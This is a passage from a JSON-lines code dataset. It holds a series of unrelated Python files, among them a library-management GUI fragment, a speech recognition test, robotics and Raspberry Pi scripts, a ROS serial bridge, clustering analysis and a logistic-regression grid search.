admin_page.main.mainloop()\r\n\r\n # rd_test = rd(23, 'test', '')\r\n # rd_page = rd_page(rd_test, usr_name='reader')\r\n # rd_page.main.mainloop()\r\n\r\n # 第三测试层级\r\n # test = book_details('test')\r\n #\r\n\r\n'''\r\n20-3-28 更新\r\n目标\r\n 可借数量不得大于总共 用户登录检查 搜索实时刷新 可借数量还有些微妙的bug\r\n20-3-27 更新\r\n基本完成GUI界面,放弃多文件编译\r\n目前实现功能\r\n 登陆界面-> 读者/管理员界面\r\n 读者界面-> 借入 归还 查看已借 查看借阅记录 退出(->登陆)\r\n 管理员界面-> 导入 添加/编辑(->图书详情) 删除 退出(->登陆)\r\n目标\r\n 加入图书被借阅记录, 没确定位置\r\n 加入查找功能,\r\n\r\n20-3-21 更新\r\n 基本画好GUI, 用了treeview控件可以绑定鼠标事件\r\n 写了三个文件一堆堆函数和类,但是完全结合不起来的样子, mysql也很麻烦还是用csv吧\r\n\r\n20-3-16 画饼\r\n 总之写了很多类, 但是互相还没什么关系\r\n 用csv和pandas的库操作了下数据, pandas不大适合这种类型\r\n\r\n usr class def & all things\r\n # 基类:\r\n # 用户类:具有用户名、密码、用户编号等属性;\r\n # 具有登陆、查看主界面、查看图书详情等功能;\r\n # 图书类:具有名称、索书号、作者等属性;\r\n # 派生类:\r\n # 用户类派生类有管理员类、用户类,用户编号区间不同,\r\n # 衍生功能有管理员对图书的增删改查,用户对图书的借还功能;\r\n # 图书类派生有一些具体类别,主要衍生了一个类别属性。\r\n'''\r\n\r\n\r\n\r\n\r\n","sub_path":"lib_manage.py","file_name":"lib_manage.py","file_ext":"py","file_size_in_byte":26563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"483173272","text":"import speech_recognition as sr\n\nr = sr.Recognizer()\n\nwith sr.Microphone() as source:\n r.adjust_for_ambient_noise(source)\n print(\"Say something\")\n audio = r.listen(source)\n\ntry:\n print(\"You said: \" + r.recognize_sphinx(audio))\nexcept sr.UnknownValueError:\n print(\"Could not understand\")\nexcept sr.RequestError as e:\n print(\"Error; {0}\".format(e))","sub_path":"test_scripts/test_speach.py","file_name":"test_speach.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"23109396","text":"import logging\n\n# -- Rename this file to config.py! --\n\n# Enter discord token from https://discordapp.com/developers/applications/me/\ntoken='yoursupersecrettoken'\n# color of the embed\ncolor = 0x859900\n# keywords to trigger the bot in passive channels\nkeywords = ['!pob']\n# reacts to pastebin posts with pob info in these channels\nactive_channels = ['pob']\n# debug level\ndebug_level = logging.INFO\n\npresence_message = '!pob '","sub_path":"config.example.py","file_name":"config.example.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"61805758","text":"import sys\nimport json\nimport os\nimport io\nimport re\nfrom logicUtils import parseFunctions\n\ndef buildGate(sLogic, n=0, gateI=0):\n g = ''\n be = ''\n c = ''\n w = ''\n gn = ''\n gi = gateI\n s = ''\n i = n\n rg = []\n bes = []\n while True:\n c = sLogic[i:i+1]\n if (c == '('):\n # recurse to new gate\n ts, ti, tg, tTop, trg, tbes = buildGate(sLogic, i+1, gi)\n rg.append(ts)\n for og in trg:\n rg.append(og)\n for ob in tbes:\n bes.append(ob)\n gi = tg\n gn = 'G' + str(tTop)\n #advance to i\n i = ti\n elif (c == ')'):\n # return to parent\n be = w\n bes.append(be)\n if (gn == ''):\n s = s + '\\n'\n else:\n s = s + '\\n'\n gn = ''\n s = s + '\\n'\n s = s + '\\n'\n return s, i, gi, gateI, rg, bes\n elif (c == ' '):\n # process grammar, either event or command\n if (w == 'and'):\n # and gate\n if (g == 'and'):\n # add child to gate\n if (gn == ''):\n s = s + '\\n'\n else:\n s = s + '\\n'\n gn = ''\n elif (g == ''):\n # new gate\n s = s + '\\n'\n s = s + '\\n'\n s = s + '\\n'\n if (gn == ''):\n s = s + '\\n'\n else:\n s = s + '\\n'\n gn = ''\n gi = gi + 1\n else:\n # ambiguous grouping dependent on order of operations\n # don't handle this for now, throw an error to verify\n # this actually exists\n # AND has precedence in Python\n raise Exception('logic', 'ambiguous_and')\n g = 'and'\n w = ''\n elif (w == 'or'):\n # or gate\n if (g == 'or'):\n # add child to gate\n if (gn == ''):\n s = s + '\\n'\n else:\n s = s + '\\n'\n gn = ''\n elif (g == ''):\n # new gate\n s = s + '\\n'\n s = s + '\\n'\n s = s + '\\n'\n if (gn == ''):\n s = s + '\\n'\n else:\n s = s + '\\n'\n gn = ''\n gi = gi + 1\n else:\n # ambiguous grouping dependent on order of operations\n # don't handle this for now, throw an error to verify\n # this actually exists\n # AND has precedence in Python\n raise Exception('logic', 'ambiguous_or')\n g = 'or'\n w = ''\n else:\n # basic event\n be = w\n w = ''\n bes.append(be)\n elif (i == len(sLogic)):\n # last event in string, not recursed\n be = w\n bes.append(be)\n if (s == ''):\n # only one event in the logic, no gates\n s = sLogic\n else:\n if (gn == ''):\n s = s + '\\n'\n else:\n s = s + '\\n'\n gn = ''\n s = s + '\\n'\n s = s + '\\n'\n for og in rg:\n s = s + og\n md = buildEvents(bes)\n s = '\\n\\n\\n\\n' + s + '\\n\\n' + md + '\\n'\n return s\n else:\n w = w + c\n i = i + 1\n\ndef buildEvents(bes):\n s = ''\n for be in bes:\n if (be != ''):\n s = s + '\\n\\n\\n\\n'\n return s\n\ndef writeFaultTree(location, loc, rule, outpath):\n logic_ft = outpath + loc + '.xml'\n #logic_string = region_json[1]['locations']['Ice Cavern Iron Boots Chest']\n #logic_string = logic_string.replace('can_use(Dins_Fire)','(Dins_Fire and Magic_Meter)')\n logic_string = parseFunctions(rule)\n #print(logic_string)\n ft = buildGate(logic_string)\n with io.open(logic_ft, 'w') as f:\n f.write(ft)\n #print(ft)\n return logic_ft\n\nlogicDir = '../OoTR-5.1/data/World/'\nfile_path = logicDir + 'Deku Tree.json'\n\n#writeFaultTree(file_path,'./')","sub_path":"convertLogic.py","file_name":"convertLogic.py","file_ext":"py","file_size_in_byte":5391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"142501345","text":"import os\nfrom statistics import mode\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nimport ClusteringAlgorithms\nimport DataSets\n\n\nclass OptimalNClusters:\n def __init__(self, clusteringAlgorithmList: list = ClusteringAlgorithms.clusteringAlgorithmList):\n \"\"\"\n init method.\n\n Args:\n clusteringAlgorithmList (list, optional): list of ClusteringAlgorithm objects for us to get the optimal NClusters of. Defaults to ClusteringAlgorithms.clusteringAlgorithmList.\n \"\"\"\n self.clusteringAlgorithmList = clusteringAlgorithmList\n\n def runRandomStates(self, dataset, maxNClusters: int, randomStateList: list):\n \"\"\"\n Get the optimal number of clusters for each algorithm for every random state in the random state list, given the input data-set.\n Saves the results in a CSV file.\n\n Args:\n dataset (DataSet object): the dataset we want to get the optimal number of clusters for.\n maxNClusters (int): maximum number of clusters to check.\n randomStateList (list): list of different Random states\n \"\"\"\n randomStateNClustersDict = {}\n for randomState in randomStateList:\n randomStateNClustersDict[str(randomState)] = self.optimalNClusters(\n dataset, maxNClusters, randomState)\n\n resultDf = pd.DataFrame(randomStateNClustersDict)\n maxFrequencyColumn = []\n averageColumn = []\n for _, row in resultDf.iterrows():\n maxFrequencyColumn.append(mode(row))\n averageColumn.append(np.mean(row))\n\n resultDf['MostFrequent'] = maxFrequencyColumn\n resultDf['Average'] = averageColumn\n\n # ---------- Save results in a CSV file ----------\n directory = os.path.join(\n os.getcwd(), f\"Results\\\\Dataset{dataset.getDatasetIndex()}\\\\OptimalNClusters\")\n try:\n os.makedirs(directory)\n except FileExistsError:\n pass\n resultDf.to_csv(\n directory + f\"\\\\{maxNClusters}ClusterRange{len(randomStateList)}RandomStates.csv\")\n\n def optimalNClusters(self, dataset, maxNClusters: int, randomState: int) -> dict:\n \"\"\"\n Calculate the optimal number of clusters for the dataset, with the input random state for each algorithm by taking the NClusters with the highest Silhouette score.\n Saves the Silhouette score plot.\n Returns a dict with the algorithms name and optimal NClusters.\n\n Args:\n dataset (DataSet object): the dataset we want to get the optimal number of clusters for.\n maxNClusters (int): maximum number of clusters to check.\n randomState (int): integer representing a random state.\n\n Returns:\n dict: key - algorithm name, value - optimal NClusters.\n \"\"\"\n\n # key - algorithm name, value - list of silhouette scores for each nClusters\n algoNameSillScoreDict = {}\n algoNameMaxScoreDict = {}\n nClustersRange = range(2, maxNClusters + 1)\n for clusterAlgo in self.clusteringAlgorithmList:\n sillScoreList = []\n clusterAlgo.setDataFrame(dataset.getDataFrame())\n for nClusters in nClustersRange:\n print(\n f\"{clusterAlgo.getName()} Clustering dataset {dataset.getDatasetIndex()} with {nClusters} Clusters and Random state {randomState}\")\n clusterAlgo.setNClusters(nClusters)\n clusterAlgo.createLabels()\n sillScore = clusterAlgo.getSilhouetteScore()\n sillScoreList.append(sillScore)\n\n algoNameSillScoreDict[clusterAlgo.getName()] = sillScoreList\n\n for name, sillScoreList in algoNameSillScoreDict.items():\n plt.plot(nClustersRange, sillScoreList, 'o-', label=name)\n algoNameMaxScoreDict[name] = nClustersRange[np.argmax(\n sillScoreList)]\n plt.legend()\n plt.title(\n f\"Silhouette Score For Data-Set {dataset.getDatasetIndex()} With Random State {randomState}\")\n plt.xlabel(\"Number Of Clusters\")\n plt.ylabel(\"Silhouette Score\")\n\n # ---------- Save Plot ----------\n directory = os.path.join(\n os.getcwd(), f\"Results\\\\Dataset{dataset.getDatasetIndex()}\\\\OptimalNClusters\")\n try:\n os.makedirs(directory)\n except FileExistsError:\n pass\n plt.savefig(directory + f\"\\\\RandomState{randomState}.png\")\n plt.close()\n return algoNameMaxScoreDict\n\n\n# 10 most comman random seeds.\nrandomStateList = [0, 1, 42, 1234, 10, 123, 2, 5, 12, 12345]\n\nonc = OptimalNClusters()\nfor ds in DataSets.dataSetList:\n ds.prepareDataset()\n onc.runRandomStates(ds, 10, randomStateList)\n","sub_path":"MidTermAssignment/Code/OptimalNClusters.py","file_name":"OptimalNClusters.py","file_ext":"py","file_size_in_byte":4766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"650808003","text":"def solve(num):\n if num == 0:\n return \"INSOMNIA\"\n\n digits = [0] * 10\n start = num\n\n while True:\n s = str(num)\n for c in s:\n digits[int(c)] = 1\n\n if( good(digits) ):\n return num\n else:\n num += start\n\n\ndef good(arr):\n for i in arr:\n if i == 0:\n return False\n return True\n\ncases = int(input())\nfor i in range(cases):\n case = int(input())\n print(\"Case #{}: {}\".format(i+1, solve(case)))\n","sub_path":"codes/CodeJamCrawler/16_0_1/mtcliatt/second_small.py","file_name":"second_small.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"554985736","text":"# ----------------------------------------------------------------------------\n# pyglet\n# Copyright (c) 2006-2008 Alex Holkner\n# Copyright (c) 2008-2020 pyglet contributors\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in\n# the documentation and/or other materials provided with the\n# distribution.\n# * Neither the name of pyglet nor the names of its\n# contributors may be used to endorse or promote products\n# derived from this software without specific prior written\n# permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n# ----------------------------------------------------------------------------\n\nimport pyglet\nfrom pyglet.gl import *\n\njoysticks = pyglet.input.get_joysticks()\nassert joysticks, 'No joystick device is connected'\njoystick = joysticks[0]\njoystick.open()\n\nwindow = pyglet.window.Window(width=800, height=800)\nbatch = pyglet.graphics.Batch()\n\n# Labels\npyglet.text.Label(\"Buttons:\", x=15, y=window.height - 25, font_size=14, batch=batch)\npyglet.text.Label(\"D Pad:\", x=window.width - 125, y=window.height - 25, font_size=14, batch=batch)\n\n\nbutton_labels = []\nbutton_shapes = []\n\nfor i in range(len(joystick.buttons)):\n rows = len(joystick.buttons) // 2\n y = window.height - 50 - 25 * (i % rows)\n x = 35 + 60 * (i // rows)\n label = pyglet.text.Label(f\"{i}:\", x=x, y=y, font_size=14, anchor_x='right', batch=batch)\n button_labels.append(label)\n shape = pyglet.shapes.Rectangle(x + 10, y + 1, 10, 10, color=(255, 0, 0), batch=batch)\n button_shapes.append(shape)\n\n\njoystick_rect = pyglet.shapes.Rectangle(window.width // 2, window.height // 2, 10, 10, color=(255, 0, 255), batch=batch)\njoystick_rect.anchor_position = joystick_rect.width // 2, joystick_rect.height // 2\nd_pad_rect = pyglet.shapes.Rectangle(window.width - 75, window.height - 100, 10, 10, color=(0, 0, 255), batch=batch)\n\n\n@window.event\ndef on_draw():\n window.clear()\n batch.draw()\n x = round((.5 * joystick.x + 1), 2) * window.width / 2\n y = round((-.5 * joystick.y + 1), 2) * window.height / 2\n rx = (.5 * joystick.rx + 1) * 60\n ry = (-.5 * joystick.ry + 1) * 60\n z = joystick.z * 50\n\n # Axes\n joystick_rect.position = x, y\n joystick_rect.anchor_position = joystick_rect.width // 2, joystick_rect.height // 2\n joystick_rect.width = 10 + rx + z\n joystick_rect.height = 10 + ry + z\n\n # Buttons\n for i in range(len(joystick.buttons)):\n rect = button_shapes[i]\n rect.color = (0, 255, 0) if joystick.buttons[i] else (255, 0, 0)\n\n # Hat\n d_pad_x = window.width - 100 + joystick.hat_x * 50\n d_pad_y = window.height - 100 + joystick.hat_y * 50\n d_pad_rect.position = d_pad_x, d_pad_y\n\n\npyglet.app.run()\n","sub_path":"examples/input/joystick.py","file_name":"joystick.py","file_ext":"py","file_size_in_byte":3824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"269822290","text":"\nimport robot_controller as robo\nimport time\nimport ev3dev.ev3 as ev3\n\n\ndef main():\n # beacon_seeker = ev3.BeaconSeeker(channel=1)\n ir_sensor = ev3.InfraredSensor()\n assert ir_sensor.connected\n robot = robo.Snatch3r()\n # dis = beacon_seeker.distance\n ev3.Sound.speak(\"picked up all rubbish\").wait()\n\n a = 0\n while True:\n distance = ir_sensor.proximity\n print(distance)\n # print(dis)\n if distance < 15:\n speed = 900\n robot.arm_motor.run_forever(speed_sp=speed)\n while True:\n if robot.touch_sensor.is_pressed:\n robot.arm_motor.stop(stop_action='hold')\n ev3.Sound.speak(\"in position\").wait()\n break\n robot.arm_motor.run_to_rel_pos(position_sp=-5112, speed_sp=-800)\n time.sleep(10)\n ev3.Sound.speak(\"done\").wait()\n time.sleep(1)\n a = a + 1\n if a == 20:\n break\n\n\nmain()\n","sub_path":"projects/Jun Fan/arm_solve.py","file_name":"arm_solve.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"25247804","text":"from tempfile import TemporaryDirectory\n\nfrom summer.model import StratifiedModel\n\nfrom autumn.plots import plot_scenarios\nfrom autumn.tool_kit import Scenario, get_integration_times\nfrom autumn.constants import Compartment, Stratification\n\n\ndef test_for_smoke__plot_scenarios():\n \"\"\"\n Smoke test plot_scenarios to ensure it runs without crashing.\n Does not test all code execution paths - eg. no generated outputs.\n \"\"\"\n plot_config = {\n \"translations\": {},\n \"outputs_to_plot\": [],\n }\n # Build and run scenarios\n params = {\"default\": {}, \"scenario_start_time\": 2002, \"scenarios\": {1: {}}}\n scenarios = [\n Scenario(_build_model, 0, params),\n Scenario(_build_model, 1, params),\n ]\n scenarios[0].run()\n scenarios[1].run(base_model=scenarios[0].model)\n with TemporaryDirectory() as tmp_out_dir:\n plot_scenarios(scenarios, tmp_out_dir, plot_config)\n\n\ndef _build_model(*args, **kwargs):\n pop = 1000\n model = StratifiedModel(\n times=get_integration_times(2000, 2005, 1),\n compartment_types=[Compartment.SUSCEPTIBLE, Compartment.INFECTIOUS],\n initial_conditions={Compartment.SUSCEPTIBLE: pop},\n parameters={},\n requested_flows=[],\n starting_population=pop,\n )\n # Add basic age stratification\n model.stratify(\n Stratification.AGE,\n strata_request=[0, 5, 15, 60],\n compartment_types_to_stratify=[],\n requested_proportions={},\n )\n return model\n","sub_path":"tests/test_plotting.py","file_name":"test_plotting.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"99717412","text":"from sys import stdin\n\ndef solutions(n, f, s):\n if n > 2:\n tmp = f\n f += s\n s = tmp\n return solutions(n-1, f, s)\n else:\n return f+s\n\nf, s = 1, 0\nprint(solutions(int(stdin.readline().rstrip()), f, s))","sub_path":"02. 재귀_특별_풀이(훈련)/solutions/1915. (재귀함수) 피보나치 수열.py","file_name":"1915. (재귀함수) 피보나치 수열.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"213220958","text":"import os\nimport shutil\n\nimport jina.proto.jina_pb2 as jina_pb2\nfrom google.protobuf.json_format import MessageToJson\nfrom jina.executors.indexers import BaseIndexer\n\nfrom .. import LevelDBIndexer\n\ncur_dir = os.path.dirname(os.path.abspath(__file__))\n\n\ndef rm_files(file_paths):\n for file_path in file_paths:\n if os.path.exists(file_path):\n if os.path.isfile(file_path):\n os.remove(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path, ignore_errors=False, onerror=None)\n\n\ndef run_test(indexer):\n def create_document(doc_id, text, weight, length):\n d = jina_pb2.Document()\n d.id = doc_id\n d.buffer = text.encode('utf8')\n d.weight = weight\n d.length = length\n return d\n\n with indexer as idx:\n data = {\n 'd1': MessageToJson(create_document(1, 'cat', 0.1, 3)),\n 'd2': MessageToJson(create_document(2, 'dog', 0.2, 3)),\n 'd3': MessageToJson(create_document(3, 'bird', 0.3, 3)),\n }\n idx.add(data)\n idx.touch()\n idx.save()\n save_abspath = idx.save_abspath\n index_abspath = idx.index_abspath\n assert os.path.exists(index_abspath)\n assert os.path.exists(save_abspath)\n\n with BaseIndexer.load(save_abspath) as searcher:\n doc = searcher.query('d2')\n assert doc.id == 2\n assert doc.length == 3\n\n rm_files([save_abspath, index_abspath])\n\n\ndef test_add_query():\n indexer = LevelDBIndexer(level='doc', index_filename='leveldb.db')\n run_test(indexer)\n\n\ndef test_load_yaml():\n from jina.executors import BaseExecutor\n indexer = BaseExecutor.load_config(os.path.join(cur_dir, 'yaml/test-leveldb.yml'))\n run_test(indexer)\n","sub_path":"indexers/keyvalue/LevelDBIndexer/tests/test_leveldbindexer.py","file_name":"test_leveldbindexer.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"52939054","text":"import time\nimport RPi.GPIO as GPIO\nimport os\nrun_yolo = 'bash /home/pi/charlie.sh'\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(3, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\nwhile(True):\n while(True):\n x = GPIO.input(3)\n if(x == 0):\n break\n\n print('pressed')\n time.sleep(1)\n os.system(run_yolo)\n \n\n while(True):\n x = GPIO.input(3)\n if (x == 1):\n break\n print('not pressed')\n time.sleep(1)\n\n","sub_path":"GPIO/GPIO.py","file_name":"GPIO.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"419811692","text":"#!/usr/bin/env python\n\n\"\"\" Serial interface node between Arduino and ROS.\nMade for Robotics course IAS0220 \"Robotite juhtimine ja tarkvara\", August 2020, CfB, Kilian Ochs\n\nReceives Serial messages from Arduino and forwards them as ROS messages.\nThe code receives distance and IMU Euler angles from Arduino and publishes them as Integer and PoseStamped (Quaternion) messages.\n\"\"\"\nimport rospy\nfrom std_msgs.msg import Int16\nfrom geometry_msgs.msg import PoseStamped\nimport serial\nimport time\n#import tf2_ros\nimport tf_conversions\nimport math\n\nclass SerialInterface():\n\tport = \"/dev/ttyUSB0\" # Arduino Nano seems to use ttyUSB0, some other Arduino boards might use ttyAMA0\n\tbaudrate = 115200 # [bps]\n\theartbeat = 0.1 # [seconds] How fast we're reading the serial buffer and sending messages over to ROS\n\tstartSignature = \"##\"\n\tendSignature = \"\\n\"\n\tnumData = 4 # Number of fields contained in message from Arduino\n\tseqID = 0\n\t\n\t# Class constructor #\n\tdef __init__(self):\n\t\trospy.loginfo('Initializing SerialInterface node.')\n\t\trospy.init_node('SerialInterface', anonymous=True)\n\t\tself.ser = serial.Serial(self.port,self.baudrate,parity=serial.PARITY_NONE,stopbits=serial.STOPBITS_ONE,bytesize=serial.EIGHTBITS,timeout = 0)\n\t\trospy.loginfo('Connected to: \"%s\"' % self.ser.portstr)\n\t\tself.pub_distance = rospy.Publisher('distance', Int16, queue_size=10)\n\t\tself.pub_imu = rospy.Publisher('imu_quaternions', PoseStamped, queue_size=10)\n\t\tself.distanceCm = Int16()\n\t\tself.imu = PoseStamped()\n\t\trospy.loginfo('SerialInterface node initialized.')\n\t\t\n\t# Reads serial messages from Arduino and forwards them as ROS messages #\n\tdef bridge(self):\n\t\tdata = self.ser.read(9999)\n\t\tmsg = str(data)\t\t\n\t\tlastIndexStart = msg.rfind(self.startSignature)\t\t\n\t\tlastIndexStop = msg.rfind(self.endSignature)\n\t\tresultList = []\n\t\tif lastIndexStop > lastIndexStart :\n\t\t\tresultMsg = msg[lastIndexStart+len(self.startSignature) : lastIndexStop]\n\t\t\trospy.loginfo('Parsed data: \"%s\"' % resultMsg)\n\t\t\tresultList = resultMsg.split(';',self.numData)\n\t\t\tif len(resultList) == self.numData :\n\t\t\t\ttry:\n\t\t\t\t\tself.distanceCm.data = int(resultList[0])\n\t\t\t\t\troll = float(resultList[1])\n\t\t\t\t\tpitch = float(resultList[2])\n\t\t\t\t\tyaw = float(resultList[3])\n\t\t\t\t\trospy.loginfo('Distance [cm]: %d' % self.distanceCm.data)\n\t\t\t\t\trospy.loginfo('Roll [deg]: %.2f' % roll)\n\t\t\t\t\trospy.loginfo('Pitch [deg]: %.2f' % pitch)\n\t\t\t\t\trospy.loginfo('Yaw [deg]: %.2f' % yaw)\n\t\t\t\t\trospy.loginfo(\"------------------------\")\n\t\t\t\t\tself.imu.header.seq = self.seqID\n\t\t\t\t\tself.seqID += 1\n\t\t\t\t\tself.imu.header.time.sec = time.time()\n\t\t\t\t\tself.imu.header.frame_id = \"FrameID\"\n\t\t\t\t\tself.imu.pose.position.x = 0.0\n\t\t\t\t\tself.imu.pose.position.y = 0.0\n\t\t\t\t\tself.imu.pose.position.z = 0.0\n\t\t\t\t\troll_rad = math.radians(roll)\n\t\t\t\t\tpitch_rad = math.radians(pitch)\n\t\t\t\t\tyaw_rad = math.radians(yaw)\n\t\t\t\t\tq = tf_conversions.transformations.quaternion_from_euler(roll_rad, pitch_rad, yaw_rad)\n\t\t\t\t\tself.imu.pose.orientation.x = q[0]\n\t\t\t\t\tself.imu.pose.orientation.y = q[1]\n\t\t\t\t\tself.imu.pose.orientation.z = q[2]\n\t\t\t\t\tself.imu.pose.orientation.w = q[3]\n\n\t\t\t\texcept ValueError:\n\t\t\t\t\trospy.logwarn(\"Received message contains invalid values.\")\n\t\t\telse:\n\t\t\t\trospy.logwarn(\"Received message has invalid format.\")\n\t\telse:\n\t\t\trospy.logwarn(\"No valid message found in buffer.\")\n\t\tself.pub_distance.publish(self.distanceCm)\n\t\tself.pub_imu.publish(self.imu)\n\n\ndef main(args=None):\n\tserialInterface = SerialInterface()\n\twhile(not rospy.is_shutdown()):\t\t\n\t\tserialInterface.bridge()\n\t\trospy.sleep(serialInterface.heartbeat)\n\tserialInterface.ser.close()\n\trospy.loginfo('Closed serial port.')\t\n\nif __name__ == '__main__':\n main()\n","sub_path":"Python ROS node/_deprecated/serial_interface_ros_publish_quaternions.py","file_name":"serial_interface_ros_publish_quaternions.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"483997928","text":"import pandas as pd\nimport numpy as np\nimport argparse\n\ntry:\n from tlp.text_processing.util import pre_process_nli_df, get_corpus\n from tlp.text_processing.util import remove_stopwords_data, stemm_data\n from tlp.training.util import filter_df_by_label, get_binary_label\n from tlp.text_processing.util import stopword_premisse\n from tlp.text_processing.util import stopword_hypothesis\n from tlp.text_processing.util import invert\n from tlp.text_processing.util import label_internalization\n from tlp.text_processing.structural_properties import contrapositive\n from tlp.text_processing.structural_properties import implication_introduction\n from tlp.text_processing.util import transformation2augmentation\n from tlp.training.language_representation import Tfidf\n from tlp.models.logistic_regression import LRWrapper\n\nexcept ModuleNotFoundError:\n from src.tlp.text_processing.util import pre_process_nli_df, get_corpus\n from src.tlp.text_processing.util import remove_stopwords_data, stemm_data\n from src.tlp.training.util import filter_df_by_label, get_binary_label\n from src.tlp.text_processing.util import stopword_premisse\n from src.tlp.text_processing.util import stopword_hypothesis\n from src.tlp.text_processing.util import invert\n from src.tlp.text_processing.util import label_internalization\n from src.tlp.text_processing.structural_properties import contrapositive\n from src.tlp.text_processing.structural_properties import implication_introduction\n from src.tlp.text_processing.util import transformation2augmentation\n from src.tlp.training.language_representation import Tfidf\n from src.tlp.models.logistic_regression import LRWrapper\n\n\ndef train(train_path,\n use_stemmer,\n remove_stopwords,\n model_path,\n cv,\n C_bound,\n transformation,\n pct,\n verbose=1):\n\n hyperparams = {}\n hyperparams[\"RepresentationFunction\"] = Tfidf\n hyperparams[\"max_features\"] = None\n hyperparams[\"label_translation\"] = get_binary_label\n hyperparams[\"param_grid\"] = {'penalty': ['l1', 'l2'],\n 'C': np.logspace(0, 4, C_bound),\n 'solver': ['liblinear']}\n hyperparams[\"cv\"] = cv\n hyperparams[\"verbose\"] = verbose\n\n # Data prepossessing\n\n df_train = pd.read_csv(train_path)\n df_train = filter_df_by_label(df_train.dropna())\n if pct > 0:\n frac = pct / 100\n df_train = transformation2augmentation(df=df_train,\n transformation=transformation,\n frac=frac)\n\n if use_stemmer:\n df_train = stemm_data(df_train)\n\n if remove_stopwords:\n df_train = remove_stopwords_data(df_train)\n\n pre_process_nli_df(df_train)\n if verbose > 0:\n print(\"\\nTrain data shape = {}\\n\".format(df_train.shape))\n\n # Training\n\n lrw = LRWrapper(hyperparams)\n lrw.fit(df_train)\n\n # Saving\n\n lrw.save(model_path)\n\n if verbose > 0:\n print(\"= Training results =\\n\")\n print(\n 'Best penalty:',\n lrw.model.best_estimator_.get_params()['penalty'])\n print('Best C:', lrw.model.best_estimator_.get_params()['C'])\n\n\ndef main():\n msg = \"\"\"Grid search for logistic resgression\"\"\"\n parser = argparse.ArgumentParser(description=msg)\n\n parser.add_argument('train_path',\n type=str,\n help='path to train csv')\n\n parser.add_argument('model_path',\n type=str,\n help='path to save the trained model')\n\n parser.add_argument(\"-t\",\n \"--transformation\",\n type=str,\n default='contra',\n help=\"transformation (default='contrapositive')\")\n\n parser.add_argument(\"-use_stemmer\",\n \"--use_stemmer\",\n action=\"store_true\",\n default=False,\n help=\"Use stemm version of the text data (default=False)\")\n\n parser.add_argument(\"-remove_stopwords\",\n \"--remove_stopwords\",\n action=\"store_true\",\n default=False,\n help=\"Remove stopwords from the text data (default=False)\")\n\n parser.add_argument(\"-C_bound\",\n \"--C_bound\",\n type=int,\n default=5,\n help=\"Number of examples of the param C (default=5)\") # noqa\n\n parser.add_argument(\"-cv\",\n \"--cv\",\n type=int,\n default=3,\n help=\"The number of folds in a (Stratified)KFold (default=3)\") # noqa\n\n parser.add_argument(\"-pct\",\n \"--pct\",\n type=float,\n default=0,\n help=\"percentage of transformation added to training data (default=0)\") # noqa\n\n args = parser.parse_args()\n\n transformation_map = {\"contra\": contrapositive,\n 'ii': implication_introduction,\n \"invert\": invert,\n \"sh\": stopword_hypothesis,\n \"sp\": stopword_premisse,\n \"li\": label_internalization}\n\n transformation = transformation_map[args.transformation]\n\n train(train_path=args.train_path,\n use_stemmer=args.use_stemmer,\n remove_stopwords=args.remove_stopwords,\n model_path=args.model_path,\n cv=args.cv,\n C_bound=args.C_bound,\n transformation=transformation,\n pct=args.pct)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/lr_grid_search.py","file_name":"lr_grid_search.py","file_ext":"py","file_size_in_byte":5834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} 